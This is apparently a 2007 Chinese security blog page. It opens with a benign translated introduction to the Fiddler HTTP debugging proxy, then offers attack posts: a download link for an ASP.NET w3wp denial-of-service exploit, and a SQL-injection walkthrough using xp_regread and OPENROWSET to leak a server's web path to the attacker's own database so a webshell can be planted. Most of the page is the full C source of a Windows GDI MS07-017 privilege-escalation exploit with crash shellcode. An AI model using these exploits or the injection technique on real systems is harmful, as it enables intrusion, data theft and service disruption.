这个工具我已经使用比较长时间了，对我的帮助也挺大，今天我翻译的微软的文章，让更多的朋友都来了解这个不错的工具，也是我第一次翻译文章，不恰当之处请大家大家多多指正。
介绍：

你是不是曾经疑惑过你的web程序和IE是如何交互的？你是不是遇到过一些奇怪的而你又无法解决的性能瓶颈？你是不是对那些发送给服务器端的cookie 和那些你下载下来的被标记为可缓存的内容感到好奇？

Fiddler官方网站及下载地址：http://www.fiddlertool.com/Fiddler/dev/

微软的Fiddler能够帮助你回答以上的问题，不但如此，它还是一个http调试代理，它能够记录所有的你电脑和互联网之间的http通讯，Fiddler 可以也可以让你检查所有的http通讯，设置断点，以及Fiddle 所有的“进出”的数据（指cookie,html,js,css等文件，这些都可以让你胡乱修改的意思）。 Fiddler 要比其他的网络调试器要更加简单，因为它仅仅暴露http通讯还有提供一个用户友好的格式。

Fiddler 包含一个简单却功能强大的基于JScript .NET 事件脚本子系统，他非常灵活性非常棒，可以支持众多的http调试任务。Fiddler 是用C#写出来的。

。。。。。接下来是一大段废话，关于如何安装的，只要一路next，就可以了。这段话我就跳过，直接切入正题了。

Running Fiddler

当你启动了Fiddler，程序将会把自己作为一个微软互联网服务的系统代理中去。你可以通过检查代理设置对话框来验证Fiddler是被正确地截取了web请求。操作是这样的：点击IE设置，工具，局域网设置，最后点击高级。

作为系统代理，所有的来自微软互联网服务（WinInet）的http请求再到达目标Web服务器的之前都会经过Fiddle，同样的，所有的Http响应都会在返回客户端之前流经Fiddler。这样，就能明白Fiddler很多作用了吧！

当你关闭Fiddler的时候，它就会自动从系统注册表中移出，换句话说，当你关闭了Fiddler后，不会占着茅坑不拉屎。

下面，是一个Fillder的用户界面，大家可以参考参考其功能。

用Fiddler来做性能测试

HTTP统计视图

通过显示所有的Http通讯，Fiddler可以轻松的演示哪些用来生成一个页面，通过统计页面（就是Fiddler左边的那个大框）用户可以很轻松的使用多选，来得到一个WEB页面的“总重量”（页面文件以及相关js,css等）你也可以很轻松得看到你请求的某个页面，总共请求了多少次，以及多少字节被转化了。

另外，通过暴露HTTP头，用户可以看见哪些页面被允许在客户端或者是代理端进行缓存。如果要是一个响应没有包含Cache-Control 头，那么他就不会被缓存在客户端。

用Fiddler来调试

Fiddler支持断点调试概念，当你在软件的菜单—rules—automatic breakpoints选项选择beforerequest,或者当这些请求或响应属性能够跟目标的标准相匹配，Fiddler就能够暂停Http通讯，情切允许修改请求和响应。这种功能对于安全测试是非常有用的，当然也可以用来做一般的功能测试，因为所有的代码路径都可以用来演习。

Session检查

用户可以在BuilderPage项种来以手工的方式来创建一个HTTP请求（即在Fiddler右侧的tab的第三个，RequestBUILDER），或者可以使用拖拽操作从Session列表中来移动一个已经存在的请求到builder page 来再次执行这个请求。。。

Fiddler 扩展

Fiddler可以使用 .net framework来对它进行扩展。有2种为Fiddler扩展准备的基本机制：

自定义规则，和规则检查。

使用脚本化的规则来扩展Fiddler

Fiddler支持JScript .NET引擎，它可以允许用户自动地修改Http请求和响应。这个引擎能够在可视化界面修改在FiddlerUI中的Session，可以从列表中提取你感兴趣的错误，也可以移除你不感兴趣的Session。

以下的示例代码演示当cookie被加载的时候把界面变成紫色。

static function OnBeforeRequest(oSession:Fiddler.Session)

   if (oSession.oRequest.headers.Exists("Cookie")){

      oSession["ui-color"] = "purple";

      oSession["ui-bold"] = "cookie";

通过加入Inspectors来扩展Fiddler

用户可以加入一个Inspector插件对象，来使用.net下的任何语言来编写Fiddler扩展。RequestInspectors 和 ResponseInspectors提供一个格式规范的，或者是被指定的（用户自定义）Http请求和响应视图。

默认安装中，Fiddler加入了一下的Inspectors：

Request Inspectors

[RW] Headers—Shows request headers and status.

[RW] TextView—Shows the request body in a text box. （原始的请求body视图）

[RW] HexView—Shows the request body in a hexadecimal view. （body的16进制视图）

[RO] XML—Shows the request body as an XML DOM in a tree view.（以XML方式展示请求）

Response Inspectors

[RW] Transformer—Removes GZip, DEFLATE, and CHUNKED encodings for easier debugging.

[RW] Headers—Shows response headers and status.

[RW] TextView—Shows the response body in a text box.

[RW] HexView—Shows the response body in a hexadecimal view. （16进制视图）

[RO] ImageView—Shows the response body as an Image. Supports all .NET image formats.

[RO] XML—Shows the response body as an XML DOM in a tree view.

[RO] Privacy—Explains the P3P statement in the response headers, if present.（如果在响应头中有关于隐私策略的说明就展示出来）

外国牛人是怎么挖掘微软漏洞的

support@cnshark.net(admin) — Wed,11 Apr 2007 21:52:02 +0800

信息来源：混世魔王blog
w3wp remote DoS due to improper reference of STA COM components in ASP.NET
asp.net COM 的 DOS EXP 研究
牛文下载地址.以及EXP

::URL::http://hackingspirits.com/vuln-rnd/w3wp-remote-dos.zip

文章提到漏洞挖掘工具 fiddler 可以到 fiddlertool 的站上down.地址忘了。也懒得帖了。

加栽rpas 组件可以对HTTPS 进行探测.

研究学习一下 CRLF injection .

镜像下载：http://201314.free.fr/attachments/200704/w3wp-remote-dos.zip

渗透中用openrowset搞shell的方法

support@cnshark.net(admin) — Wed,11 Apr 2007 21:48:40 +0800

得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库

然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))--

在对方执行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('Select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''Select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

这样fenggou这个表里就会有这样一条记录Select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'Select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用说,''D:\WEB"就是从注册表里读出的物理路径拉.然后执行DECLARE @a1 char(255) set @a1=(Select cha8 FROM fenggou) exec (@a1);--

等于执行了Select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'Select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,这时你在你机器上SQL事件追踪器上就会显示Select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1'
哇哈哈哈哈哈物理路径到手了写小马传大马吧~

MS Windows GDI Local Privilege Escalation Exploit

support@cnshark.net(admin) — Wed,11 Apr 2007 21:45:11 +0800

#define _WIN32_WINNT 0x0500
#include
#include
#include

#pragma comment (lib, "user32.lib")
#pragma comment (lib, "gdi32.lib")
#pragma comment (lib, "shlwapi.lib")
#pragma comment (lib, "ntdll.lib")

/*
Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the
win32k's SSDT by 0x2.

before :
lkd> dps bf998300 L 2
bf998300 bf934921 win32k!NtGdiAbortDoc
bf998304 bf94648d win32k!NtGdiAbortPath

after :
lkd> dps bf998300 L 2
bf998300 00000002
bf998304 bf94648d win32k!NtGdiAbortPath

win32k.sys bDeleteBrush (called by DeleteObject)
mov esi, [edx] ;esi=pKernelInfo
cmp [esi+4], ebx ; ebx=0, we need [esi+4]>0
mov eax, [edx+0Ch]
mov [ebp+var_8], eax
ja short loc_BF80C1E7 ;jump if [esi+4] > 0

loc_BF80C1E7:
mov eax, [esi+24h] ; [esi+24] = addr to hijack (here win32k SSDT)
mov dword ptr [eax], 2 ; !!!!!

At 0x2 we allocate memory with NtAllocateVirtualMemory and we copy our payload.

Tested on windows xp sp2 french last updates (before MS07-017)

Coded by Ivanlef0u.
http://ivanlef0u.free.fr

ref:
http://www.Mcft.com/technet/security/bulletin/MS07-017.mspx
http://research.eeye.com/html/alerts/zeroday/20061106.html
http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
https://www.blackhat.com/presentations/bh-eu-07/Eriksson-Janmar/Whitepaper/bh-eu-07-eriksson-WP.pdf
http://www.securityfocus.com/bid/20940/info
*/

typedef struct
{
DWORD pKernelInfo;
WORD ProcessID;
WORD _nCount;
WORD nUpper;
WORD nType;
DWORD pUserInfo;
} GDITableEntry;

typedef enum _SECTION_INFORMATION_CLASS {
SectionBasicInformation,
SectionImageInformation
}SECTION_INFORMATION_CLASS;

typedef struct _SECTION_BASIC_INFORMATION { // Information Class 0
PVOID BaseAddress;
ULONG Attributes;
LARGE_INTEGER Size;
}SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;

extern "C" ULONG __stdcall NtQuerySection(
IN HANDLE SectionHandle,
IN SECTION_INFORMATION_CLASS SectionInformationClass,
OUT PVOID SectionInformation,
IN ULONG SectionInformationLength,
OUT PULONG ResultLength OPTIONAL
);

extern "C" ULONG __stdcall NtAllocateVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG AllocationSize,
IN ULONG AllocationType,
IN ULONG Protect
);

typedef LONG NTSTATUS;

#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation=11,
} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

extern "C" NTSTATUS __stdcall NtQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);

extern "C" ULONG __stdcall RtlNtStatusToDosError(
NTSTATUS Status
);

// generic kernel payload, reboot the b0x
unsigned char Shellcode[]={
0x60, //PUSHAD
0x55, //PUSH EBP

0x6A, 0x34,
0x5B,
0x64, 0x8B, 0x1B,
0x8B, 0x6B, 0x10,

0x8B, 0x45, 0x3C,
0x8B, 0x54, 0x05, 0x78,
0x03, 0xD5,
0x8B, 0x5A, 0x20,
0x03, 0xDD,
0x8B, 0x4A, 0x18,
0x49,
0x8B, 0x34, 0x8B,
0x03, 0xF5,
0x33, 0xFF,
0x33, 0xC0,
0xFC,
0xAC,
0x84, 0xC0,
0x74, 0x07,
0xC1, 0xCF, 0x0D,
0x03, 0xF8,
0xEB, 0xF4,
0x81, 0xFF, 0x1f, 0xaa ,0xf2 ,0xb9, //0xb9f2aa1f, KEBugCheck
0x75, 0xE1,
0x8B, 0x42, 0x24,
0x03, 0xC5,
0x66, 0x8B, 0x0C, 0x48,
0x8B, 0x42, 0x1C,
0x03, 0xC5,
0x8B, 0x04 ,0x88,
0x03, 0xC5,

0x33, 0xDB,
0xB3, 0xE5,
0x53,
0xFF, 0xD0,

0x5D, //POP EBP
0x61, //POPAD
0xC3 //RET
};

ULONG GetWin32kBase()
{
ULONG i, Count, Status, BytesRet;
PSYSTEM_MODULE_INFORMATION pSMI;

Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, 0, &BytesRet); //allocation length
if(Status!=STATUS_INFO_LENGTH_MISMATCH)
printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));

pSMI=(PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, BytesRet);

Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, BytesRet, &BytesRet);

if(Status!=STATUS_SUCCESS)
printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));

/*
The data returned to the SystemInformation buffer is a ULONG count of the number of
handles followed immediately by an array of
SYSTEM_MODULE_INFORMATION.
*/

Count=*(PULONG)pSMI;
pSMI=(PSYSTEM_MODULE_INFORMATION)((PUCHAR)pSMI+4);

for(i=0; i {
if(StrStr((pSMI+i)->ImageName, "win32k.sys"))
return (ULONG)(pSMI+i)->Base;
}

HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, pSMI);

return 0;
}

ULONG buff[500]={0};

int main(int argc, char* argv[])
{
ULONG i, PID, Status, Old;
LPVOID lpMapAddress=NULL;
HANDLE hMapFile=(HANDLE)0x10;
GDITableEntry *gdiTable;
SECTION_BASIC_INFORMATION SBI;
WORD Upr;
ULONG Size=0x1000;
PVOID Addr=(PVOID)0x2;

printf("Windows GDI MS07-017 Local Privilege Escalation Exploit\nBy Ivanlef0u\n"
"http://ivanlef0u.free.fr\n"
"Be MAD!\n");

//allocate memory at addresse 0x2
Status=NtAllocateVirtualMemory((HANDLE)-1, &Addr, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
if(Status)
printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status);
else
printf("Addr : 0x%x OKAY\n", Addr);

memcpy(Addr, Shellcode, sizeof(Shellcode));

printf("win32.sys base : 0x%x\n", GetWin32kBase());

ULONG Win32kSST=GetWin32kBase()+0x198300; //range between win32k imagebase and it's SSDT
printf("SSDT entry : 0x%x\n", Win32kSST); //win32k!NtGdiAbortDoc

HBRUSH hBr;
hBr=CreateSolidBrush(0);

Upr=(WORD)((DWORD)hBr>>16);
printf("0x%x\n", Upr);

while(!lpMapAddress)
{
hMapFile=(HANDLE)((ULONG)hMapFile+1);
lpMapAddress=MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);
}

if(lpMapAddress==NULL)
{
printf("Error with MapViewOfFile : %d\n", GetLastError());
return 0;
}

Status=NtQuerySection(hMapFile, SectionBasicInformation, &SBI, sizeof(SECTION_BASIC_INFORMATION), 0);
if (Status) //!=STATUS_SUCCESS (0)
{
printf("Error with NtQuerySection (SectionBasicInformation) : 0x%x\n", Status);
return 0;
}

printf("Handle value : %x\nMapped address : 0x%x\nSection size : 0x%x\n\n", hMapFile, lpMapAddress, SBI.Size.QuadPart);
gdiTable=(GDITableEntry *)lpMapAddress;
PID=GetCurrentProcessId();

for (i=0; i {
if(gdiTable->ProcessID==PID && gdiTable->nUpper==Upr) //only our GdiTable and brush
{

printf("gdiTable : 0x%x\n", gdiTable);
printf("pKernelInfo : 0x%x\n", gdiTable->pKernelInfo);
printf("ProcessID : %d\n", gdiTable->ProcessID);
printf("_nCount : %d\n", gdiTable->_nCount);
printf("nUpper : 0x%x\n", gdiTable->nUpper);
printf("nType : 0x%x\n", gdiTable->nType );
printf("pUserInfo : 0x%x\n\n", gdiTable->pUserInfo);

Old=gdiTable->pKernelInfo;

gdiTable->pKernelInfo=(ULONG)buff; //crafted buff
break;
}
gdiTable++;
}

if(!DeleteObject(hBr))
printf("Error with DeleteObject : %d\n", GetLastError());
else
printf("Done\n");

printf("Buff : 0x%x\n", buff);
memset(buff, 0x90, sizeof(buff));

buff[0]=0x1; //!=0
buff[0x24/4]=Win32kSST; //syscall to modifY
buff[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptr

if(!DeleteObject(hBr))
printf("Error with DeleteObject : %d\n", GetLastError());

gdiTable->pKernelInfo=Old; //restore old value

/*
lkd> uf GDI32!NtGdiAbortDoc
GDI32!NtGdiAbortDoc:
77f3073a b800100000 mov eax,1000h
77f3073f ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
77f30744 ff12 call dword ptr [edx]
77f30746 c20400 ret 4
*/

__asm
{
mov eax, 0x1000
mov edx,0x7ffe0300
call dword ptr [edx]
}

return 0;
}

// milw0rm.com [2007-04-08]

a compiled http://ivanlef0u.free.fr/repo/GDI-MS07-017.rar